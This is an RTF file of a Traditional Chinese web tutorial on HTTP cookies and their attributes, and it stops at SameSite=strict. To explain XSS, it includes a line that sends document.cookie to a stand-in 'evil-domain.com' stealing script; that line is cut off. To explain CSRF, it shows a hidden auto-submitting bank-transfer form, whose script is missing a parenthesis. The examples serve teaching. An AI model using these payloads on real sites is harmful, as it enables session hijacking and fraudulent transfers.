{\rtf1\ansi\ansicpg950\deff0\deflang1033\deflangfe1028{\fonttbl{\f0\fnil\fcharset136 \'b7\'73\'b2\'d3\'a9\'fa\'c5\'e9;}}
{\colortbl ;\red255\green0\blue0;\red155\green0\blue211;\red0\green0\blue255;}
{\*\generator Msftedit 5.41.21.2510;}\viewkind4\uc1\pard\sa200\sl276\slmult1\lang1028\f0\fs40 Cookie \'ac\'4f\'a4\'b0\'bb\'f2\'a1\'48\par
\fs32 Cookie \'ac\'4f\'c0\'78\'a6\'73\'a6\'62\'c2\'73\'c4\'fd\'be\'b9\'aa\'ba\'a4\'40\'a4\'70\'ac\'71\'a4\'e5\'a6\'72\'b8\'ea\'ae\'c6\'a1\'41\'b3\'71\'b1\'60\'a5\'d1\'a6\'f8\'aa\'41\'be\'b9\'b3\'7a\'b9\'4c Set-Cookie header \'b6\'c7\'bb\'bc\'b5\'b9\'c2\'73\'c4\'fd\'be\'b9\'a1\'43\'c2\'73\'c4\'fd\'be\'b9\'a6\'ac\'a8\'ec\'ab\'e1\'b7\'7c\'b1\'4e cookie \'c0\'78\'a6\'73\'b0\'5f\'a8\'d3\'a1\'41\'a8\'c3\'a6\'62\'a4\'a7\'ab\'e1\'aa\'ba\'bd\'d0\'a8\'44\'a6\'5e\'b6\'c7 cookie \'a6\'dc\'a6\'50\'bc\'cb\'aa\'ba\'a6\'f8\'aa\'41\'be\'b9\'a1\'43\par
\fs22\par
\fs40 Cookie \'aa\'ba\'a5\'ce\'b3\'7e\par
\cf1\fs32 Cookie \'b3\'cc\'b1\'60\'a8\'a3\'aa\'ba\'a5\'ce\'b3\'7e\'a4\'a7\'a4\'40\'ac\'4f\'bb\'7b\'c3\'d2\'a8\'ad\'a5\'f7\'a1\'41\'a8\'d2\'a6\'70\'b5\'6e\'a4\'4a\'aa\'ac\'ba\'41\'a1\'42\'c1\'ca\'aa\'ab\'a8\'ae\'b5\'a5\'a1\'41\'a4\'5d\'b3\'51\'c0\'b3\'a5\'ce\'a9\'f3\'b0\'6c\'c2\'dc\'a8\'cf\'a5\'ce\'aa\'cc\'a4\'ce\'bc\'73\'a7\'69\'a4\'57\'a1\'43\cf0\par
Cookie \'a4\'5d\'b3\'51\'a5\'ce\'a9\'f3\'ab\'c8\'a4\'e1\'ba\'dd\'aa\'ba\'c0\'78\'a6\'73\'a4\'e8\'a6\'a1\'a1\'41\'a6\'fd\'a5\'d1\'a9\'f3 cookie \'b7\'7c\'b3\'51\'aa\'fe\'a5\'5b\'a6\'62\'a8\'43\'a4\'40\'a6\'b8\'aa\'ba request \'a4\'a7\'a4\'a4\'a1\'41\'a5\'69\'af\'e0\'b7\'7c\'bc\'76\'c5\'54\'ae\'c4\'af\'e0\'a1\'41\cf2\'a9\'d2\'a5\'48\'a6\'70\'aa\'47\'ac\'4f\'a4\'a3\'bb\'dd\'ad\'6e\'b0\'4f\'bf\'fd\'a6\'62 server \'aa\'ba\'b8\'ea\'b0\'54\'a1\'41\'a5\'69\'a5\'48\'a7\'ef\'a5\'ce storage API\'a1\'43\par
\par
\cf0\fs40 Set-Cookie header\par
\fs32 Server \'a5\'69\'a5\'48\'a6\'62 HTTP response \'a4\'a4\'a6\'5e\'b6\'c7 Set-Cookie header \'a8\'d3\'a7\'69\'b6\'44\'c2\'73\'c4\'fd\'be\'b9\'ad\'6e\'b3\'5d\'a9\'77 cookie\'a1\'43\'b3\'5d\'a9\'77\'aa\'ba\'bb\'79\'aa\'6b\'a6\'70\'a4\'55\'a1\'47\par
Set-Cookie: [cookie\'a6\'57\'ba\'d9]=[cookie\'ad\'c8]\par
\'c2\'73\'c4\'fd\'be\'b9\'ac\'dd\'a8\'ec Set-Cookie header \'ab\'4b\'b7\'7c\'b1\'4e cookie \'c0\'78\'a6\'73\'b0\'5f\'a8\'d3\'a1\'41\'a4\'a7\'ab\'e1\'b9\'ef\'a6\'50\'a4\'40\'ad\'d3 domain \'b5\'6f\'b0\'65 HTTP request \'aa\'ba\'ae\'c9\'ad\'d4\'a1\'41\'c2\'73\'c4\'fd\'be\'b9\'b4\'4e\'b7\'7c\'b1\'4e cookie \'b1\'61\'a6\'62 HTTP request \'aa\'ba Cookie header \'b8\'cc\'a1\'43\par
Request \'a4\'a4\'aa\'ba cookie header \'b7\'7c\'ac\'4f [cookie\'a6\'57\'ba\'d9]=[cookie\'ad\'c8] \'aa\'ba\'a7\'ce\'a6\'a1\'a1\'41\'a5\'ce\'a4\'c0\'b8\'b9\'a6\'ea\'b1\'b5\'a4\'a7\'ab\'e1\'aa\'ba\'b5\'b2\'aa\'47\'a1\'47\par
Cookie: [cookie1]=[value1]; [cookie2]=[value2]\par
\par
\fs40\'a6\'70\'a6\'f3\'a5\'ce JavaScript \'c5\'aa\'a8\'fa Cookie\par
\fs32\'a6\'62 JavaScript \'a4\'a4\'a1\'41\'b7\'51\'ad\'6e\'c5\'aa\'a8\'fa cookie \'a5\'69\'a5\'ce document.cookie:\par
console.log(document.cookie);\par
\'c5\'aa\'a8\'fa\'a5\'58\'a8\'d3\'aa\'ba document.cookie \'b7\'7c\'b1\'6f\'a8\'ec\'a4\'40\'ad\'d3\'a6\'72\'a6\'ea\'a1\'41\'b3\'6f\'ad\'d3\'a6\'72\'a6\'ea\'ac\'4f\'b1\'4e\'b3\'6f\'ad\'d3\'ba\'f4\'b0\'ec\'a9\'b3\'a4\'55\'a9\'d2\'a6\'b3 cookie \'a5\'ce\'a4\'c0\'b8\'b9\'a6\'ea\'b1\'b5\'a5\'48\'ab\'e1\'aa\'ba\'b5\'b2\'aa\'47\'a1\'41\'a8\'e4\'a4\'a4\'a8\'43\'ad\'d3 cookie \'b3\'a3\'ac\'4f [cookie\'a6\'57\'ba\'d9]=[cookie\'ad\'c8] \'aa\'ba\'a7\'ce\'a6\'a1\'a1\'41\'a8\'d2\'a6\'70\'a1\'47name=John; gender=male \'aa\'ed\'a5\'dc\'b3\'6f\'ad\'d3\'ba\'f4\'b0\'ec\'a9\'b3\'a4\'55\'a6\'b3\'a8\'e2\'ad\'d3 cookie\'a1\'47name \'a9\'4d gender\'a1\'41\'a8\'e4\'a4\'a4 name \'aa\'ba\'ad\'c8\'ac\'4f John\'a1\'41\'a6\'d3 gender \'aa\'ba\'ad\'c8\'ac\'4f male\'a1\'43\par
\par
\par
\fs40 Cookie \'aa\'ba\'b0\'d1\'bc\'c6\par
\fs32 Cookie \'b0\'a3\'a4\'46\'a6\'57\'ba\'d9\'a9\'4d\'ad\'c8\'a4\'a7\'a5\'7e\'a1\'41\'b3\'71\'b1\'60\'c1\'d9\'bb\'dd\'ad\'6e\'b3\'5d\'a9\'77\'a8\'e4\'a5\'4c\'c3\'42\'a5\'7e\'b0\'d1\'bc\'c6\'a1\'41\'a4\'55\'ad\'b1\'b7\'7c\'a4\'40\'a4\'40\'a4\'b6\'b2\'d0\'a1\'43\'b7\'73\'bc\'57\'b0\'d1\'bc\'c6\'aa\'ba\'a4\'e8\'a6\'a1\'ac\'4f\'a5\'ce\'a4\'c0\'b8\'b9\'b0\'cf\'b9\'6a\'a6\'55\'ad\'d3\'b0\'d1\'bc\'c6\'a1\'41\'a8\'d2\'a6\'70\'a1\'47\par
user=John;\cf1  path=/;\cf2  expires=Tue, 19 Jan 2038 03:14:07 GMT\par
\cf0\'c2\'b2\'b3\'e6\'a6\'61\'bb\'a1\'a1\'41\'a7\'da\'ad\'cc\'b7\'7c\cf1\'a5\'ce Domain \'a9\'4d Path \'ab\'fc\'a9\'77 cookie \'aa\'ba\'a5\'69\'a5\'ce\'bd\'64\'b3\'f2\'a1\'41\cf0\'a5\'ce Expires \'a9\'4d Max-Age \'b1\'b1\'a8\'ee cookie \'aa\'ba\'a6\'b3\'ae\'c4\'b4\'c1\'ad\'ad\'a1\'41\'a6\'d3\cf2  HttpOnly\'a1\'42Secure\'a1\'42\'a9\'4d SameSite \'ab\'68\'ac\'4f\'a9\'4d\'a6\'77\'a5\'fe\'a9\'ca\'ac\'db\'c3\'f6\'aa\'ba\'b0\'d1\'bc\'c6\'a1\'43\par
\par
\cf0\fs40 Domain\par
\fs32 domain=example.com\par
domain \'a5\'ce\'a8\'d3\'ab\'fc\'a9\'77\'ad\'fe\'a8\'c7\'ba\'f4\'b0\'ec\'a5\'69\'a5\'48\'a6\'73\'a8\'fa\'b3\'6f\'ad\'d3 cookie\'a1\'43\'b9\'77\'b3\'5d\'ad\'c8\'ac\'4f\'b7\'ed\'ab\'65\'ba\'f4\'b0\'ec\'a1\'41\'a6\'fd\'ac\'4f\'a4\'a3\'a5\'5d\'a7\'74\'a8\'e4\'a4\'6c\'ba\'f4\'b0\'ec\'a1\'43\par
\'a8\'d2\'a6\'70\'a6\'62 example.com \'a9\'b3\'a4\'55\'b3\'5d\'b8\'6d\'aa\'ba cookie \'a4\'a3\'ab\'fc\'a9\'77 domain \'aa\'ba\'b1\'a1\'aa\'70\'a4\'55\'a1\'41\'a5\'75\'a6\'b3 example.com \'a5\'69\'a5\'48\'a6\'73\'a8\'fa\'a6\'b9 cookie\'a1\'41\'a6\'fd\'a4\'6c\'ba\'f4\'b0\'ec\'a6\'70 subdomain.example.com \'ab\'68\'b5\'4c\'aa\'6b\'a6\'73\'a8\'fa\'a6\'b9 cookie\'a1\'43\par
\'a6\'70\'aa\'47\'a7\'da\'ad\'cc\'b7\'51\'ad\'6e\'c5\'fd\'a4\'6c\'ba\'f4\'b0\'ec\'a6\'73\'a8\'fa cookie\'a1\'41\'b4\'4e\'a5\'b2\'b6\'b7\'a9\'fa\'bd\'54\'a6\'61\'b3\'5d\'a9\'77 domain \'b0\'d1\'bc\'c6\'a1\'43\'a8\'d2\'a6\'70\'a1\'47\'b7\'ed\'a4\'40\'ad\'d3 cookie \'ab\'fc\'a9\'77 domain=example.com \'ae\'c9\'a1\'41\'a5\'5d\'a7\'74 example.com \'a5\'48\'a4\'ce\'a5\'4c\'aa\'ba\'a4\'6c\'ba\'f4\'b0\'ec subdomain.example.com \'b3\'a3\'af\'e0\'b0\'f7\'a6\'73\'a8\'fa\'b3\'6f\'ad\'d3 cookie\'a1\'43\par
\par
\fs40 Path\par
\fs32 path=/admin\par
path \'b0\'d1\'bc\'c6\'a5\'ce\'a8\'d3\'ab\'fc\'a9\'77\'ad\'fe\'a8\'c7\'b8\'f4\'ae\'7c\'a5\'69\'a5\'48\'a6\'73\'a8\'fa\'b3\'6f\'ad\'d3 cookie\'a1\'43\par
\'a8\'d2\'a6\'70\'a1\'47\'b0\'b2\'b3\'5d domain \'ac\'4f example.com\'a1\'41\'a5\'42 path=/admin\'a1\'41\'ab\'68 example.com/admin \'a9\'ce\'ac\'4f\'a4\'6c\'b8\'f4\'ae\'7c example.com/admin/settings \'b3\'a3\'a5\'69\'a5\'48\'a6\'73\'a8\'fa\'a6\'b9 cookie\'a1\'41\'a6\'fd example.com \'a9\'ce\'ac\'4f example.com/home \'ab\'68\'b5\'4c\'aa\'6b\'a6\'73\'a8\'fa\'a6\'b9 cookie\'a1\'43\par
Path \'aa\'ba\'b9\'77\'b3\'5d\'ad\'c8\'ac\'4f\'b7\'ed\'ab\'65\'aa\'ba\'b8\'f4\'ae\'7c\'a1\'43\par
\'a4\'40\'af\'eb\'a6\'d3\'a8\'a5\'a8\'d3\'bb\'a1\'a1\'41\'bb\'7b\'c3\'d2\'a5\'ce\'b3\'7e\'aa\'ba cookie \'b7\'7c\'b3\'5d\'a6\'a8 path=/\'a1\'41\'c5\'fd\'a5\'fe\'af\'b8\'b3\'a3\'a5\'69\'a5\'48\'a6\'73\'a8\'fa\'a6\'b9 cookie\'a1\'41\'a6\'70\'a6\'b9\'a4\'40\'a8\'d3\'a4\'a3\'ba\'de\'a7\'41\'a6\'62\'ba\'f4\'af\'b8\'aa\'ba\'ad\'fe\'ad\'d3\'b8\'f4\'ae\'7c\'a4\'55\'a1\'41server \'b3\'a3\'af\'e0\'bb\'7b\'b1\'6f\'a7\'41\'aa\'ba\'a8\'ad\'a5\'f7\'a1\'43\par
\par
\fs40 Expires, Max-age\par
\fs32 expires, max-age \'b0\'d1\'bc\'c6\'aa\'ba\'a7\'40\'a5\'ce\'ac\'4f\'b3\'5d\'a9\'77 cookie \'aa\'ba\'a6\'b3\'ae\'c4\'b4\'c1\'ad\'ad\'a1\'43\par
\cf1\b\'a6\'70\'aa\'47\'a8\'53\'a6\'b3\'c3\'42\'a5\'7e\'b3\'5d\'a9\'77 expires \'a9\'ce\'ac\'4f max-age \'b0\'d1\'bc\'c6\'a1\'41\'b7\'ed\'c2\'73\'c4\'fd\'be\'b9\'c3\'f6\'b3\'ac\'a4\'a7\'ab\'e1\'a1\'41\'c0\'78\'a6\'73\'a6\'62\'c2\'73\'c4\'fd\'be\'b9\'aa\'ba cookie \'ab\'4b\'b7\'7c\'ae\'f8\'a5\'a2\'a1\'41\'b3\'6f\'b4\'4e\'ac\'4f\'a9\'d2\'bf\'d7\'aa\'ba session cookie\'a1\'43\par
\cf0\b0\'a6\'70\'aa\'47\'a7\'da\'ad\'cc\'a7\'c6\'b1\'e6\'c2\'73\'c4\'fd\'be\'b9\'c3\'f6\'b1\'bc\'a4\'a7\'ab\'e1 cookie \'c1\'d9\'ac\'4f\'b7\'7c\'b3\'51\'c0\'78\'a6\'73\'a4\'55\'a8\'d3\'a1\'41\'a8\'ba\'b4\'4e\'a5\'b2\'b6\'b7\'b3\'5d\'a9\'77 expires \'a9\'ce\'ac\'4f max-age\'a1\'43\par
\cf1 expires \'ac\'4f UTC \'ae\'e6\'a6\'a1\'aa\'ed\'a5\'dc\'aa\'ba\'a6\'b3\'ae\'c4\'b4\'c1\'ad\'ad\'a1\'41\'a6\'62 JavaScript \'a4\'a4\'a5\'69\'a5\'ce date.toUTCString() \'a8\'fa\'b1\'6f\'a1\'47\par
\cf0 cookie=value; expires=Tue, 19 Jan 2038 03:14:07 GMT\par
max-age \'aa\'ed\'a5\'dc\'b1\'71\'b3\'5d\'a9\'77\'b6\'7d\'a9\'6c\'ba\'e2\'a4\'a7\'ab\'e1\'b4\'58\'ac\'ed\'a4\'a7\'a4\'ba cookie \'ac\'4f\'a6\'b3\'ae\'c4\'aa\'ba\'a1\'47\par
cookie=value; max-age=3600\par
\par
\cf1\fs40 Secure\par
\fs32 Secure \'b0\'d1\'bc\'c6\'aa\'ba\'a7\'40\'a5\'ce\'ac\'4f\'c5\'fd cookie \'a5\'75\'af\'e0\'b3\'7a\'b9\'4c https \'b6\'c7\'bb\'bc\'a1\'43Cookie \'b9\'77\'b3\'5d\'ac\'4f\'a4\'a3\'b0\'cf\'a4\'c0 http \'a9\'ce\'ac\'4f https \'aa\'ba\'a1\'43\cf0\par
\'b4\'ab\'a5\'79\'b8\'dc\'bb\'a1\'a1\'41\'b7\'ed\'a7\'da\'ad\'cc\'b3\'5d\'a9\'77 {\field{\*\fldinst{HYPERLINK "http://example.com"}}{\fldrslt{\ul\cf3 http://example.com}}}\f0\fs32  \'aa\'ba cookie \'ae\'c9\'a1\'41{\field{\*\fldinst{HYPERLINK "https://example.com"}}{\fldrslt{\ul\cf3 https://example.com}}}\f0\fs32  \'a4\'5d\'af\'e0\'ac\'dd\'b1\'6f\'a8\'ec\'a6\'50\'bc\'cb\'aa\'ba cookie\'a1\'43\par
\'a6\'70\'aa\'47 cookie \'b3\'5d\'a4\'46 secure \'b0\'d1\'bc\'c6\'a1\'41\'a5\'75\'a6\'b3\'b3\'7a\'b9\'4c https \'a6\'73\'a8\'fa\'b3\'6f\'ad\'d3\'ba\'f4\'af\'b8\'a4\'7e\'af\'e0\'a6\'73\'a8\'fa\'b3\'6f\'ad\'d3 cookie\'a1\'46\'b3\'7a\'b9\'4c http \'a6\'73\'a8\'fa\'b3\'6f\'ad\'d3\'ba\'f4\'af\'b8\'b7\'7c\'ac\'dd\'a4\'a3\'a8\'ec\'b3\'6f\'ad\'d3 cookie\'a1\'43\par
\'b3\'6f\'ad\'d3\'b0\'d1\'bc\'c6\'aa\'ba\'a7\'40\'a5\'ce\'a6\'62\'a9\'f3\'ab\'4f\'c5\'40 cookie \'a5\'75\'af\'e0\'a6\'62 https \'b6\'c7\'bb\'bc\'a1\'43\'b8\'dc\'c1\'f6\'a6\'70\'a6\'b9\'a1\'41\'a7\'da\'ad\'cc\'c1\'d9\'ac\'4f\'a4\'a3\'af\'e0\'b1\'4e\'b1\'d3\'b7\'50\'b8\'ea\'b0\'54\'c0\'78\'a6\'73\'a6\'62 cookie \'a4\'a4\'a1\'43\par
\par
\fs40 HttpOnly\par
\cf1\fs32 HttpOnly \'b0\'d1\'bc\'c6\'aa\'ba\'a7\'40\'a5\'ce\'ac\'4f\'a8\'be\'a4\'ee JavaScript \'a6\'73\'a8\'fa cookie\'a1\'43\par
\'b7\'ed\'a4\'40\'ad\'d3 cookie \'b3\'5d\'b8\'6d\'a4\'46 httpOnly \'aa\'ba\'c4\'dd\'a9\'ca\'a4\'a7\'ab\'e1\'a1\'41JavaScript \'b4\'4e\'a4\'a3\'af\'e0\'a6\'73\'a8\'fa\'b3\'6f\'ad\'d3 cookie\'a1\'41\'a6\'fd\'ac\'4f\'c2\'73\'c4\'fd\'be\'b9\'a6\'62\'b5\'6f\'b0\'65 request \'aa\'ba\'ae\'c9\'ad\'d4\'c1\'d9\'ac\'4f\'b7\'7c\'c0\'b0\'a7\'41\'b1\'61\'a6\'62 request header \'b8\'cc\'ad\'b1\'a1\'43\par
\'b3\'6f\'ad\'d3\'b0\'d1\'bc\'c6\'aa\'ba\'b3\'5d\'ad\'70\'ac\'4f\'ac\'b0\'a4\'46\'a6\'77\'a5\'fe\'a9\'ca\'a6\'d2\'b6\'71\'a1\'41\'a6\'5d\'ac\'b0\'a6\'70\'aa\'47 JavaScript \'af\'e0\'b0\'f7\'a6\'73\'a8\'fa\'b3\'6f\'ad\'d3 cookie \'b4\'4e\'a6\'b3\'a8\'fc\'a8\'ec XSS Attack (Cross-Site Scripting\'a1\'41\'b8\'f3\'af\'b8\'b8\'7d\'a5\'bb\'a7\'f0\'c0\'bb) \'aa\'ba\'ad\'b7\'c0\'49\'a1\'43\par
\cf0\'a4\'b0\'bb\'f2\'ac\'4f XSS Attack (\'b8\'f3\'af\'b8\'b8\'7d\'a5\'bb\'a7\'f0\'c0\'bb) \'a9\'4f\'a1\'48\'c2\'b2\'b3\'e6\'aa\'ba\'bb\'a1\'a1\'41\'b4\'4e\'ac\'4f\'b1\'4e\'a4\'40\'ac\'71\'b4\'63\'b7\'4e\'aa\'ba JavaScript \'b5\'7b\'a6\'a1\'bd\'58\'b3\'7a\'b9\'4c\'aa\'ed\'b3\'e6\'b5\'a5\'a4\'e8\'a6\'a1\'a4\'57\'b6\'c7\'a8\'ec server\'a1\'41\'a4\'a7\'ab\'e1\'b3\'6f\'a5\'f7\'aa\'ed\'b3\'e6\'b8\'ea\'ae\'c6\'a6\'62\'ab\'65\'ba\'dd\'a7\'65\'b2\'7b\'aa\'ba\'ae\'c9\'ad\'d4\'b4\'63\'b7\'4e\'aa\'ba JavaScript \'b5\'7b\'a6\'a1\'bd\'58\'b7\'7c\'b3\'51\'b7\'ed\'a6\'a8\'ac\'4f HTML \'aa\'ba\'a4\'40\'b3\'a1\'a4\'c0\'b3\'51\'b0\'f5\'a6\'e6\'a1\'43\'b0\'b2\'b3\'5d\'c3\'61\'a4\'48\'af\'e0\'b0\'f7\'b0\'f5\'a6\'e6 JavaScript\'a1\'41\'ab\'4b\'af\'e0\'ab\'dc\'bb\'b4\'a9\'f6\'a6\'61\'a6\'73\'a8\'fa document.cookie\'a1\'41\'b4\'4e\'af\'e0\'b0\'f7\'c5\'d1\'a8\'fa\'a7\'41\'a5\'ce\'a8\'d3\'b5\'6e\'a4\'4a\'aa\'ba cookie\'a1\'41\'a8\'c3\'a5\'42\'a5\'ce\'a7\'41\'aa\'ba\'a8\'ad\'a5\'f7\'b0\'b5\'b4\'63\'b7\'4e\'aa\'ba\'be\'de\'a7\'40\'a1\'47\par
// \'a7\'e2\'a7\'41\'aa\'ba cookie \'b0\'65\'a8\'ec\'c3\'61\'a4\'48\'aa\'ba\'a6\'f8\'aa\'41\'be\'b9\par
(new Image()).src = "{\field{\*\fldinst{HYPERLINK "http://www.evil-domain.com/steal-cookie.php?cookie="}}{\fldrslt{\ul\cf3 http://www.evil-domain.com/steal-cookie.php?cookie=}}}\f0\fs32 " +\par
\'b3\'6f\'b4\'4e\'ac\'4f\'ac\'b0\'a4\'b0\'bb\'f2\'a7\'da\'ad\'cc\'bb\'dd\'ad\'6e\'b8\'54\'a4\'ee JavaScript \'a6\'73\'a8\'fa cookie\'a1\'43\par
\par
\fs40 SameSite\par
\cf1\fs32 Samesite \'aa\'ba\'a7\'40\'a5\'ce\'ac\'4f\'a8\'be\'a4\'ee cookie \'a5\'48\'b8\'f3\'af\'b8\'a4\'e8\'a6\'a1\'b6\'c7\'b0\'65\'a1\'41\'a5\'69\'a5\'48\'c0\'b0\'a7\'55\'c1\'d7\'a7\'4b CSRF (Cross-Site Request Forgery\'a1\'41\'b8\'f3\'af\'b8\'bd\'d0\'a8\'44\'b0\'b0\'b3\'79) \'a7\'f0\'c0\'bb\'a1\'43\cf0\'ad\'6e\'b2\'7a\'b8\'d1 SameSite \'a6\'70\'a6\'f3\'c0\'b0\'a7\'55\'a8\'be\'a4\'ee CSRF \'a7\'f0\'c0\'bb\'a4\'a7\'ab\'65\'a1\'41\'a7\'da\'ad\'cc\'bb\'dd\'ad\'6e\'a5\'fd\'b2\'7a\'b8\'d1 CSRF \'a7\'f0\'c0\'bb\'a1\'43\par
CSRF \'a7\'f0\'c0\'bb\'ac\'4f\'a4\'b0\'bb\'f2\'a9\'4f\'a1\'48\'c2\'b2\'b3\'e6\'a6\'61\'bb\'a1\'a1\'41\'a5\'4c\'b7\'7c\'a6\'62\'a8\'fc\'ae\'60\'aa\'cc\'a4\'77\'b5\'6e\'a4\'4a\'aa\'ba\'aa\'ac\'ba\'41\'a4\'55\'a1\'41\'b0\'b2\'ad\'c9\'a8\'fc\'ae\'60\'aa\'cc\'aa\'ba\'a8\'ad\'a5\'f7\'b6\'69\'a6\'e6\'b4\'63\'b7\'4e\'be\'de\'a7\'40\'a1\'41\'a8\'d2\'a6\'70\'a7\'e2\'a8\'fc\'ae\'60\'aa\'cc\'bb\'c8\'a6\'e6\'b8\'cc\'aa\'ba\'bf\'fa\'c2\'e0\'a8\'ec\'a7\'f0\'c0\'bb\'aa\'cc\'a6\'db\'a4\'76\'aa\'ba\'b1\'62\'a4\'e1\'a4\'a4\'a1\'43\par
\par
\'a8\'ba\'a8\'e3\'c5\'e9\'a6\'d3\'a8\'a5 CSRF \'a7\'f0\'c0\'bb\'a6\'70\'a6\'f3\'b6\'69\'a6\'e6\'a1\'48\par
\'b0\'b2\'b3\'5d\'a7\'74\'a6\'b3\'a8\'cf\'a5\'ce\'aa\'cc\'aa\'ba\'be\'f7\'b1\'d3\'b8\'ea\'b0\'54\'ba\'f4\'af\'b8\'a5\'73\'b0\'b5 bank.com\'a1\'41\'a8\'cf\'a5\'ce\'aa\'cc\'a6\'a8\'a5\'5c\'b5\'6e\'a4\'4a bank.com \'ab\'e1\'b7\'7c\'a6\'ac\'a8\'ec\'a4\'40\'ad\'d3\'a5\'5b\'b1\'4b\'b9\'4c\'ab\'e1\'aa\'ba\'a5\'4e\'aa\'ed\'a5\'4c\'aa\'ba\'a8\'ad\'a5\'f7\'aa\'ba cookie\'a1\'41\'ab\'e1\'c4\'f2\'aa\'ba request \'b3\'a3\'b7\'7c\'b1\'61\'a6\'b3\'b3\'6f\'ad\'d3 cookie\'a1\'43\'a6\'5d\'ac\'b0 cookie \'b8\'67\'b9\'4c\'a5\'5b\'b1\'4b\'b5\'4c\'aa\'6b\'bb\'b4\'a9\'f6\'b0\'b0\'b3\'79\'a1\'41\'a9\'d2\'a5\'48 server \'a5\'69\'a5\'48\'bb\'7b\'c3\'d2 request \'ac\'4f\'a8\'d3\'a6\'db\'b3\'6f\'ad\'d3\'a8\'cf\'a5\'ce\'aa\'cc\'a5\'bb\'a4\'48\'a1\'41\'a4\'5d\'b7\'7c\'a6\'50\'b7\'4e\'a5\'4c\'aa\'ba\'c2\'e0\'b1\'62\'b5\'a5\'b1\'d3\'b7\'50\'be\'de\'a7\'40\'a1\'43\par
\'c3\'61\'a4\'48\'b3\'7a\'b9\'4c\'b3\'a8\'b3\'bd\'ab\'48\'a5\'f3\'b5\'a5\'a4\'e8\'a6\'a1\'c5\'fd\'a7\'41\'a4\'a3\'a4\'70\'a4\'df\'b6\'69\'a8\'ec\'c3\'61\'a4\'48\'aa\'ba\'ba\'f4\'af\'b8 evil.com\'a1\'41\'ba\'f4\'ad\'b6\'a5\'5d\'a7\'74\'a4\'40\'a4\'70\'ac\'71\'b5\'6f\'b0\'65\'aa\'ed\'b3\'e6\'aa\'ba\'a5\'4e\'bd\'58\'a1\'41\'b7\'7c\'a7\'e2 bank.com \'aa\'ba\'bf\'fa\'c2\'e0\'a8\'ec\'c3\'61\'a4\'48\'aa\'ba\'a4\'e1\'c0\'59\'a1\'47\par
<form action="https://bank.com/transfer" method="POST">\par
  <input type="hidden" name="account" value="john">\par
  <input type="hidden" name="amount" value="1000000">\par
  <input type="hidden" name="for" value="badguy">\par
</form>\par
<script>window.addEventListener('DOMContentLoaded', (e) => \{ document.querySelector('form').submit(); \}</script>\par
\par
\'a6\'5d\'ac\'b0\'b0\'65\'a9\'b9 bank.com \'aa\'ba request \'b3\'a3\'b7\'7c\'b1\'61\'a6\'b3\'a5\'ce\'a8\'d3\'aa\'ed\'a5\'dc\'a8\'ad\'a5\'f7\'aa\'ba cookie\'a1\'41\'a5\'5d\'a7\'74\'b5\'6f\'b0\'65\'aa\'ed\'b3\'e6\'aa\'ba POST request\'a1\'41\'a9\'d2\'a5\'48 server \'b7\'7c\'bb\'7b\'ac\'b0\'b3\'6f\'ad\'d3 request \'a8\'53\'a6\'b3\'b0\'dd\'c3\'44\'a1\'41\'b5\'4d\'ab\'e1\'bf\'fa\'b4\'4e\'c2\'e0\'b5\'b9\'c3\'61\'a4\'48\'a4\'46\'a1\'e3\par
\par
\'b3\'6f\'b8\'cc\'aa\'ba\'c3\'f6\'c1\'e4\'ac\'4f\'a1\'47\cf1\'b3\'6f\'ad\'d3 POST \'ac\'4f\'a4\'40\'ad\'d3\'b8\'f3\'b0\'ec\'bd\'d0\'a8\'44\cf0\'a1\'43\cf1\'a4\'b0\'bb\'f2\'ac\'4f\'b8\'f3\'b0\'ec\'bd\'d0\'a8\'44\'a9\'4f\'a1\'48\'b7\'ed\'a4\'40\'ad\'d3\'bd\'d0\'a8\'44\'aa\'ba\'ba\'f4\'b0\'ec\'a9\'4d\'ba\'f4\'a7\'7d\'a6\'43\'a4\'a4\'aa\'ba\'ba\'f4\'b0\'ec\'a4\'a3\'a6\'50\'aa\'ba\'ae\'c9\'ad\'d4\'a1\'41\'a5\'a6\'b4\'4e\'ac\'4f\'a4\'40\'ad\'d3\'b8\'f3\'b0\'ec\'bd\'d0\'a8\'44\'a1\'43 \cf0\'b3\'6f\'f9\'d8\'a7\'da\'ad\'cc\'a5\'69\'a5\'48\'ac\'dd\'a8\'ec\'a1\'41\'c2\'73\'c4\'fd\'be\'b9\'aa\'ba\'ba\'f4\'a7\'7d\'a6\'43\'a4\'a4\'aa\'ba\'ba\'f4\'b0\'ec\'ac\'4f evil.com\'a1\'41\'a6\'fd\'ac\'4f\'a7\'da\'ad\'cc\'b0\'65\'a4\'46\'a4\'40\'ad\'d3\'a9\'b9 bank.com \'ba\'f4\'b0\'ec\'aa\'ba POST request\'a1\'41\'a9\'d2\'a5\'48\'b3\'6f\'ac\'4f\'a4\'40\'ad\'d3\'b8\'f3\'b0\'ec\'bd\'d0\'a8\'44\'a1\'43\par
\cf1\b\'a6\'d3\'b8\'f3\'b0\'ec\'bd\'d0\'a8\'44\'c4\'e2\'b1\'61 cookie \'b4\'4e\'b7\'7c\'a6\'b3\'be\'44\'a8\'fc CSRF \'a7\'f0\'c0\'bb\'aa\'ba\'ad\'b7\'c0\'49\'a1\'43\par
\cf0\b0\par
\'a8\'ba\'a7\'da\'ad\'cc\'a6\'41\'a6\'5e\'a8\'d3\'ac\'dd SameSite \'b0\'d1\'bc\'c6\'a6\'70\'a6\'f3\'a8\'f3\'a7\'55\'a7\'da\'ad\'cc\'a8\'be\'bd\'64 CSRF \'a7\'f0\'c0\'bb\'a1\'43\par
\b SameSite \'a4\'40\'a6\'40\'a6\'b3\'a4\'54\'ba\'d8\'a4\'a3\'a6\'50\'aa\'ba\'b3\'5d\'a9\'77\'a1\'41\'a4\'c0\'a7\'4f\'b9\'ef\'c0\'b3\'a4\'a3\'a6\'50\'aa\'ba\'a6\'77\'a5\'fe\'a9\'ca\'bc\'68\'af\'c5\'a1\'47\par
\b0 SameSite=strict\par
